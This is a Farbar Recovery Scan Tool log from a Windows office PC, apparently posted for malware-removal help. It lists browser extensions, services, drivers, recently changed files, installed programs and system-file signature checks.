FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2013-10-29]

Chrome:
=======
CHR HomePage: Default ->
CHR DefaultSearchKeyword: Default -> E98ED600F1C9242E7997AB17DAB841AEF03147B22C6A5B9A388F68BDD00F86FF
CHR DefaultSearchProvider: Default -> 4A45418813A5B80C3EED5F0039A2EDA0B2FBDA2A4677DA540511CBDA1C26D0B4
CHR DefaultSearchURL: Default -> 6749570A10E8921BEA39D1DB81137CE7353B54E922FACB712362F12E70FDB73D
CHR CustomProfile: C:\Users\abaskins\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\abaskins\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-10-08]
CHR Extension: (Google Docs) - C:\Users\abaskins\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-19]
CHR Extension: (Google Drive) - C:\Users\abaskins\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-19]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\abaskins\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-10-07]
CHR Extension: (YouTube) - C:\Users\abaskins\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-19]
CHR Extension: (Google Search) - C:\Users\abaskins\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-19]
CHR Extension: (Google Sheets) - C:\Users\abaskins\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-10-08]
CHR Extension: (Google Wallet) - C:\Users\abaskins\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-19]
CHR Extension: (Gmail) - C:\Users\abaskins\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-19]
CHR HKLM\...\Chrome\Extension: [cnpkmcjgpcihgfnkcjapiaabbbplkcmf] - C:\Program Files\Coupons.com CouponBar\chrome\Coupons.com.crx []

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX86\OfficeClickToRun.exe [1664176 2014-08-11] (Microsoft Corporation)
S3 cphs; C:\Windows\system32\IntelCpHeciSvc.exe [279024 2013-03-13] (Intel Corporation)
R2 DellDigitalDelivery; C:\Program Files\Dell Digital Delivery\DeliveryService.exe [202248 2014-04-10] (Dell Products, LP.)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [1337752 2013-09-12] (ESET)
R3 ICCS; C:\Program Files\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe [169752 2012-04-24] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [586240 2013-05-11] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [637912 2013-05-11] (Intel® Corporation)
R2 jhi_service; C:\Program Files\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-09-12] (Intel Corporation)
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
R2 PasswordBox; C:\Program Files\PasswordBox\pbbtnService.exe [67584 2014-05-14] (PasswordBox, Inc.) [File not signed]
R2 SAService; C:\Windows\system32\SAsrv.exe [446592 2010-11-19] (Conexant Systems, Inc.)
S2 vToolbarUpdater18.1.9; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 avgtp; C:\Windows\system32\drivers\avgtpx86.sys [42784 2014-08-12] (AVG Technologies)
R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [188808 2013-09-17] (ESET)
R1 eeCtrl; C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys [377648 2014-08-14] (Symantec Corporation)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [134248 2013-09-17] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [122376 2013-09-17] (ESET)
R0 iaStorA; C:\Windows\System32\DRIVERS\iaStorA.sys [531816 2013-07-15] (Intel Corporation)
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [25960 2013-07-15] (Intel Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-05-12] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-10-09] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-05-12] (Malwarebytes Corporation)
R3 MEI; C:\Windows\System32\DRIVERS\TeeDriver.sys [85464 2013-09-12] (Intel Corporation)
S3 netvsc; C:\Windows\System32\DRIVERS\netvsc60.sys [126464 2010-11-20] (Microsoft Corporation)
S3 SynthVid; C:\Windows\System32\DRIVERS\VMBusVideoM.sys [19456 2010-11-20] (Microsoft Corporation)
R3 vpcbus; C:\Windows\System32\DRIVERS\vpchbus.sys [172416 2013-03-11] (Microsoft Corporation)
R1 vpcnfltr; C:\Windows\System32\DRIVERS\vpcnfltr.sys [48128 2013-03-11] (Microsoft Corporation)
R3 vpcusb; C:\Windows\System32\DRIVERS\vpcusb.sys [78336 2013-03-11] (Microsoft Corporation)
R1 vpcvmm; C:\Windows\System32\drivers\vpcvmm.sys [296192 2013-03-11] (Microsoft Corporation)
S3 catchme; \??\C:\Users\abaskins\AppData\Local\Temp\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-09 07:58 - 2014-10-09 07:59 - 00014776 _____ () C:\Users\abaskins\Desktop\FRST.txt
2014-10-09 07:58 - 2014-10-09 07:58 - 00000000 ____D () C:\FRST
2014-10-09 07:57 - 2014-10-09 07:56 - 01101312 _____ (Farbar) C:\Users\abaskins\Desktop\FRST.exe
2014-10-08 17:52 - 2014-10-08 17:52 - 00000000 ____D () C:\Users\abaskins\Documents\Bleeping Computer Files
2014-10-08 17:51 - 2014-10-08 17:51 - 00015896 _____ () C:\Users\abaskins\Desktop\dds.txt
2014-10-08 17:51 - 2014-10-08 17:51 - 00005517 _____ () C:\Users\abaskins\Desktop\attach.txt
2014-10-08 17:46 - 2014-10-08 17:45 - 00688992 ____R (Swearware) C:\Users\abaskins\Desktop\dds.com
2014-10-08 17:44 - 2014-10-09 05:08 - 00000000 ____D () C:\Users\abaskins\AppData\Local\CrashDumps
2014-10-08 16:43 - 2014-10-08 16:43 - 00000000 ____D () C:\NPE
2014-10-08 16:41 - 2014-10-08 16:46 - 00000000 ____D () C:\Users\abaskins\AppData\Local\NPE
2014-10-08 16:41 - 2014-10-08 16:40 - 03060320 ____N (Symantec Corporation) C:\Users\abaskins\Desktop\NPE.exe
2014-10-08 16:40 - 2014-10-08 16:40 - 03060320 _____ (Symantec Corporation) C:\Users\abaskins\Downloads\NPE.exe
2014-10-08 15:47 - 2014-10-08 15:47 - 00002456 _____ () C:\Users\abaskins\Desktop\JRT.txt
2014-10-08 15:46 - 2014-10-08 15:46 - 00000000 ____D () C:\Windows\ERUNT
2014-10-08 15:44 - 2014-10-08 15:44 - 01705141 _____ (Thisisu) C:\Users\abaskins\Desktop\JRT.exe
2014-10-08 15:44 - 2014-10-08 15:44 - 00000000 ____D () C:\Users\abaskins\Downloads\Junkware Removal Tool
2014-10-08 15:27 - 2014-10-07 17:49 - 01375089 _____ () C:\Users\abaskins\Desktop\AdwCleaner.exe
2014-10-08 15:13 - 2014-10-08 15:13 - 02347384 _____ (ESET) C:\Users\abaskins\Downloads\esetsmartinstaller_enu.exe
2014-10-08 15:08 - 2014-10-08 15:09 - 00000000 ____D () C:\DLLHOST
2014-10-08 15:07 - 2014-10-08 15:07 - 00048229 _____ () C:\ComboFix.txt
2014-10-08 14:44 - 2014-10-08 15:07 - 00000000 ____D () C:\Qoobox
2014-10-08 14:44 - 2014-10-08 15:06 - 00000000 ____D () C:\Windows\erdnt
2014-10-08 14:44 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-08 14:44 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-08 14:44 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-08 14:44 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-08 14:44 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-08 14:44 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-08 14:44 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-08 14:44 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-08 14:41 - 2014-10-08 14:41 - 05582481 ____R (Swearware) C:\Users\abaskins\Desktop\ComboFix.exe
2014-10-08 14:40 - 2014-10-08 14:41 - 05582481 _____ (Swearware) C:\Users\abaskins\Downloads\ComboFix.exe
2014-10-08 14:18 - 2014-10-08 14:19 - 00150376 _____ () C:\Windows\Minidump\100814-12620-01.dmp
2014-10-08 11:06 - 2014-10-08 11:06 - 00000000 ____D () C:\cc7da2abb943a08459f7361f5e
2014-10-08 11:05 - 2014-10-08 11:05 - 30856384 _____ (Microsoft Corporation) C:\Users\abaskins\Downloads\Windows-KB890830-V5.16.exe
2014-10-08 07:58 - 2014-10-08 08:08 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-08 07:58 - 2014-10-08 07:58 - 00000963 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-08 07:58 - 2014-10-08 07:58 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-10-08 07:57 - 2014-10-08 07:57 - 00000000 ____D () C:\Users\abaskins\Downloads\CCleaner
2014-10-07 17:50 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\system32\sqlite3.dll
2014-10-07 17:49 - 2014-10-08 15:41 - 00000000 ____D () C:\AdwCleaner
2014-10-07 17:46 - 2014-10-07 17:47 - 00000000 ____D () C:\Users\abaskins\Downloads\Adware Cleaner
2014-10-07 17:37 - 2014-10-07 17:38 - 00007605 _____ () C:\Users\abaskins\AppData\Local\Resmon.ResmonCfg
2014-10-07 14:41 - 2014-10-09 07:44 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-07 14:40 - 2014-10-07 14:40 - 00001058 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-07 14:40 - 2014-10-07 14:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-07 14:40 - 2014-10-07 14:40 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-07 14:40 - 2014-10-07 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-07 14:40 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-07 14:40 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-07 14:40 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-07 13:59 - 2014-10-07 13:59 - 00000000 ____D () C:\Users\abaskins\AppData\Local\ESET
2014-10-07 13:09 - 2014-10-07 13:09 - 00909328 _____ () C:\Users\abaskins\Downloads\WebClient (1).exe
2014-10-07 13:08 - 2014-10-07 13:10 - 00000000 ____D () C:\Windows\system32\webclient
2014-10-07 13:07 - 2014-10-07 13:07 - 00909328 _____ () C:\Users\abaskins\Downloads\WebClient.exe
2014-10-01 07:57 - 2014-09-24 20:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-09-24 07:57 - 2014-09-09 16:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-09-12 03:06 - 2014-08-19 12:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-09-12 03:06 - 2014-08-18 17:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-09-12 03:06 - 2014-08-18 17:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-09-12 03:06 - 2014-08-18 16:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-09-12 03:06 - 2014-08-18 16:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-09-12 03:06 - 2014-08-18 16:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-09-12 03:06 - 2014-08-18 16:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-09-12 03:06 - 2014-08-18 16:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-09-12 03:06 - 2014-08-18 16:44 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-09-12 03:06 - 2014-08-18 16:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-09-12 03:06 - 2014-08-18 16:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-09-12 03:06 - 2014-08-18 16:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-09-12 03:06 - 2014-08-18 16:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-09-12 03:06 - 2014-08-18 16:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-09-12 03:06 - 2014-08-18 16:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-09-12 03:06 - 2014-08-18 16:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-09-12 03:06 - 2014-08-18 16:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-09-12 03:06 - 2014-08-18 16:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-09-12 03:06 - 2014-08-18 16:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-09-12 03:06 - 2014-08-18 16:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-09-12 03:06 - 2014-08-18 16:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-09-12 03:06 - 2014-08-18 16:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-09-12 03:06 - 2014-08-18 16:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-09-12 03:06 - 2014-08-18 16:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-09-12 03:06 - 2014-08-18 16:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-09-12 03:06 - 2014-08-18 16:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-09-12 03:06 - 2014-08-18 16:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-09-12 03:06 - 2014-08-18 15:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-09-12 03:06 - 2014-08-18 15:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-09-12 03:06 - 2014-08-18 15:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-09-12 03:06 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-09-11 19:41 - 2014-07-06 20:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-09-11 19:41 - 2014-07-06 20:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-09-11 19:40 - 2014-09-04 20:52 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-11 19:40 - 2014-09-04 20:47 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-11 19:40 - 2014-08-01 06:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-09-11 19:40 - 2014-06-23 21:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-09 07:57 - 2013-03-11 14:12 - 01557527 _____ () C:\Windows\WindowsUpdate.log
2014-10-09 07:55 - 2013-03-11 14:14 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-09 07:52 - 2009-07-13 23:34 - 00031312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-09 07:52 - 2009-07-13 23:34 - 00031312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-09 07:48 - 2010-11-20 16:01 - 00799706 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-09 07:46 - 2013-11-20 13:22 - 00000000 ____D () C:\Program Files\PasswordBox
2014-10-09 07:44 - 2013-11-19 08:47 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-09 07:44 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-09 07:44 - 2009-07-13 23:39 - 00037592 _____ () C:\Windows\setupact.log
2014-10-08 16:42 - 2014-08-14 07:51 - 00000000 ____D () C:\ProgramData\Norton
2014-10-08 16:42 - 2013-10-30 07:57 - 00000000 ____D () C:\Users\abaskins\Documents\Outlook Files
2014-10-08 16:14 - 2013-10-29 07:28 - 00000000 ____D () C:\Users\abaskins
2014-10-08 15:42 - 2013-10-29 13:19 - 00000000 ____D () C:\Program Files\ESET
2014-10-08 15:42 - 2010-11-20 16:48 - 00385240 _____ () C:\Windows\PFRO.log
2014-10-08 15:07 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-10-08 15:06 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-10-08 14:18 - 2014-02-19 11:06 - 00000000 ____D () C:\Windows\Minidump
2014-10-08 14:18 - 2014-02-19 11:05 - 301696520 _____ () C:\Windows\MEMORY.DMP
2014-10-08 10:50 - 2014-07-16 15:58 - 00011311 _____ () C:\Users\abaskins\Desktop\Copy of HELD INVOICES TEMPLATE.xlsx
2014-10-08 10:28 - 2013-11-18 17:09 - 00000000 ____D () C:\GreatPlains
2014-10-07 16:09 - 2013-10-30 11:10 - 00000000 ____D () C:\Windows\Downloaded Installations
2014-10-07 13:34 - 2013-11-18 16:26 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-01 15:08 - 2013-11-22 14:41 - 00021247 _____ () C:\Users\abaskins\Desktop\FIBERWEB INV.xlsx
2014-09-29 08:14 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-09-29 07:47 - 2013-10-29 17:22 - 00000000 ____D () C:\Program Files\Microsoft Office 15
2014-09-26 08:30 - 2013-11-19 08:51 - 00002131 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-09-24 08:55 - 2013-03-11 14:14 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-09-24 08:55 - 2013-03-11 14:14 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-09-15 09:06 - 2013-10-29 13:00 - 00231568 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-09-12 09:45 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-09-12 03:06 - 2013-10-29 14:37 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-12 03:03 - 2014-05-07 03:03 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-09-10 11:45 - 2014-08-26 08:50 - 00000348 _____ () C:\Windows\Tasks\0814tbUpdateInfo.job
2014-09-10 11:45 - 2014-08-26 08:50 - 00000000 ____D () C:\ProgramData\Avg_Update_0814tb

Some content of TEMP:
====================
C:\Users\abaskins\AppData\Local\Temp\catchme.dll
C:\Users\abaskins\AppData\Local\Temp\Quarantine.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-08-28 03:03

==================== End Of Log ============================

 

 

**********************************   ADDITION LOG  **********************************

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 06-10-2014 01
Ran by abaskins at 2014-10-09 08:00:31
Running from C:\Users\abaskins\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET NOD32 Antivirus 7.0 (Enabled - Up to date) {19259FAE-8396-A113-46DB-15B0E7DFA289}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: ESET NOD32 Antivirus 7.0 (Enabled - Up to date) {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM\...\Adobe Shockwave Player) (Version: 12.1.3.153 - Adobe Systems, Inc.)
Audacity 2.0.5 (HKLM\...\Audacity_is1) (Version: 2.0.5 - Audacity Team)
Bullzip PDF Printer 10.1.0.1871 (HKLM\...\Bullzip PDF Printer_is1) (Version: 10.1.0.1871 - Bullzip)
Catalina Savings Printer (HKLM\...\{37331C16-3E97-4A20-80D8-BFB43AB0E2FB}) (Version: 1.0.0 - Catalina Marketing Corp) <==== ATTENTION
CCleaner (HKLM\...\CCleaner) (Version: 4.18 - Piriform)
Conexant Audio Filter Agent (HKLM\...\cAudioFilterAgent) (Version: 1.7.36.0 - Conexant Systems)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.50.5.51 - Conexant)
Conexant SmartAudio (HKLM\...\SAII) (Version: 6.0.109.0 - Conexant Systems)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery Manager (HKLM\...\{B7FB9195-E9FC-4316-930E-D799D5D712F7}) (Version: 1.3.1 - Dell Inc.)
Dell Client System Update (HKLM\...\{04566294-A6B6-4462-9721-031073EB3694}) (Version: 1.3.0 - Dell Inc.)
Dell Digital Delivery (HKLM\...\{D850CB7E-72BC-4510-BA4F-48932BFAB295}) (Version: 2.9.901.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{3138EAD3-700B-4A10-B617-B3F8096EE30D}) (Version: 1.0.0 - Dell Inc)
Dexterity Shared Components 11.0 (HKLM\...\{74C84D32-0BFE-4DF1-A59A-49EEECE4043B}) (Version: 11.00.0218.006 - Microsoft Corporation)
ESET NOD32 Antivirus (HKLM\...\{1BE7C1D9-06A8-466D-ADEA-B07F68BDEFB5}) (Version: 7.0.302.26 - ESET, spol s r. o.)
Google Chrome (HKLM\...\Google Chrome) (Version: 37.0.2062.124 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
GoToAssist Corporate (HKLM\...\GoToAssist) (Version: 10.4.0.917 - Citrix Online, a division of Citrix Systems, Inc.)
Integration Manager for Microsoft Dynamics GP 2010 (HKLM\...\{FAFD8B80-E75F-4557-85F3-67B8D7A14E8F}_UI) (Version: 11.00.1269.000 - Microsoft Corporation)
Integration Manager for Microsoft Dynamics GP 2010 (Version: 11.0.0.0 - Microsoft Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.14.1724 - Intel Corporation)
Intel® Processor Graphics (HKLM\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.3040 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.7.1.1000 - Intel Corporation)
Intel® Rapid Storage Technology (Version: 12.7.1.1000 - Intel Corporation) Hidden
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Intel® Trusted Connect Service Client (Version: 1.28.487.1 - Intel Corporation) Hidden
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 11.0.8156.0 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft Dynamics GP 2010 (HKLM\...\{DC90A0A6-2D90-493E-8D13-D54AD123B9FD}_Ex) (Version: 11.00.1269.000 - Microsoft)
Microsoft Dynamics GP 2010 (Version: 11.00.1269.000 - Microsoft) Hidden
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 15.0.4649.1003 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft SkyDrive (HKCU\...\SkyDriveSetup.exe) (Version: 17.0.2003.1112 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{D9D937B0-E842-4130-9588-B948E876904A}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
Norton Security Scan (HKLM\...\NSS) (Version: 4.1.0.29 - Symantec Corporation)
Office 15 Click-to-Run Extensibility Component (Version: 15.0.4641.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4641.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (Version: 15.0.4641.1003 - Microsoft Corporation) Hidden
Open XML SDK 2.0 for Microsoft Office (HKLM\...\{171D8D76-3F05-455A-A8AF-C561C2679905}) (Version: 2.0.5022 - Microsoft Corporation)
